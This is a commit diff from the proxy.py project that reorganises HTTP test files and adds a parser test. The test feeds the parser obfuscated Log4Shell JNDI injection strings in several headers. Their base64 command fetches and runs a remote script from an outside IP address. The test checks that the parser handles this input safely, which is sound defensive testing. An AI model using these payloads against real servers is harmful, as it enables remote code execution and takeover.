abhinavsingh
diff --git a/‎setup.cfg
Lines changed: 1 addition & 1 deletion b/‎setup.cfg
Lines changed: 1 addition & 1 deletion
diff --git a/‎tests/http/parser/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/parser/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_chunk_parser.py renamed to ‎tests/http/parser/test_chunk_parser.py b/‎tests/http/test_chunk_parser.py renamed to ‎tests/http/parser/test_chunk_parser.py
diff --git a/‎tests/http/test_http_parser.py renamed to ‎tests/http/parser/test_http_parser.py
Lines changed: 48 additions & 0 deletions b/‎tests/http/test_http_parser.py renamed to ‎tests/http/parser/test_http_parser.py
Lines changed: 48 additions & 0 deletions
diff --git a/‎tests/http/test_proxy_protocol.py renamed to ‎tests/http/parser/test_proxy_protocol.py b/‎tests/http/test_proxy_protocol.py renamed to ‎tests/http/parser/test_proxy_protocol.py
diff --git a/‎tests/http/test_tls_parser.py renamed to ‎tests/http/parser/test_tls_parser.py b/‎tests/http/test_tls_parser.py renamed to ‎tests/http/parser/test_tls_parser.py
diff --git a/‎tests/http/tls_server_hello.data renamed to ‎tests/http/parser/tls_server_hello.data b/‎tests/http/tls_server_hello.data renamed to ‎tests/http/parser/tls_server_hello.data
diff --git a/‎tests/http/proxy/__init__.py
Lines changed: 10 additions & 0 deletions b/‎tests/http/proxy/__init__.py
Lines changed: 10 additions & 0 deletions
diff --git a/‎tests/http/test_http2.py renamed to ‎tests/http/proxy/test_http2.py b/‎tests/http/test_http2.py renamed to ‎tests/http/proxy/test_http2.py
diff --git a/‎tests/http/test_http_proxy.py renamed to ‎tests/http/proxy/test_http_proxy.py b/‎tests/http/test_http_proxy.py renamed to ‎tests/http/proxy/test_http_proxy.py
@@ -121,4 +121,4 @@ exclude =
   tests.*
 
 [codespell]
-skip = tests/http/tls_server_hello.data
+skip = tests/http/parser/tls_server_hello.data
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""
@@ -763,3 +763,51 @@ def test_proxy_protocol_not_for_response_parser(self) -> None:
                 httpParserTypes.RESPONSE_PARSER,
                 enable_proxy_protocol=True,
             )
+
+    def test_is_safe_against_malicious_requests(self) -> None:
+        self.parser.parse(
+            b'GET / HTTP/1.1\r\n' +
+            b'Host: 34.131.9.210:443\r\n' +
+            b'User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'Content-Type: application/x-www-form-urlencoded\r\n' +
+            b'nReferer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' +
+            b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}\r\n' +
+            b'Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}' +
+            b'\r\n\r\n',
+        )
+        self.assertEqual(
+            self.parser.header(b'user-agent'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'content-type'),
+            b'application/x-www-form-urlencoded',
+        )
+        self.assertEqual(
+            self.parser.header(b'nreferer'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'X-Api-Version'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}' +
+            b'://198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
+        self.assertEqual(
+            self.parser.header(b'cookie'),
+            b'${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:' +
+            b'//198.98.53.25:1389/TomcatBypass/Command/Base64d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pd' +
+            b'C5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOw==}',
+        )
@@ -0,0 +1,10 @@
+# -*- coding: utf-8 -*-
+"""
+    proxy.py
+    ~~~~~~~~
+    ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on
+    Network monitoring, controls & Application development, testing, debugging.
+
+    :copyright: (c) 2013-present by Abhinav Singh and contributors.
+    :license: BSD, see LICENSE for more details.
+"""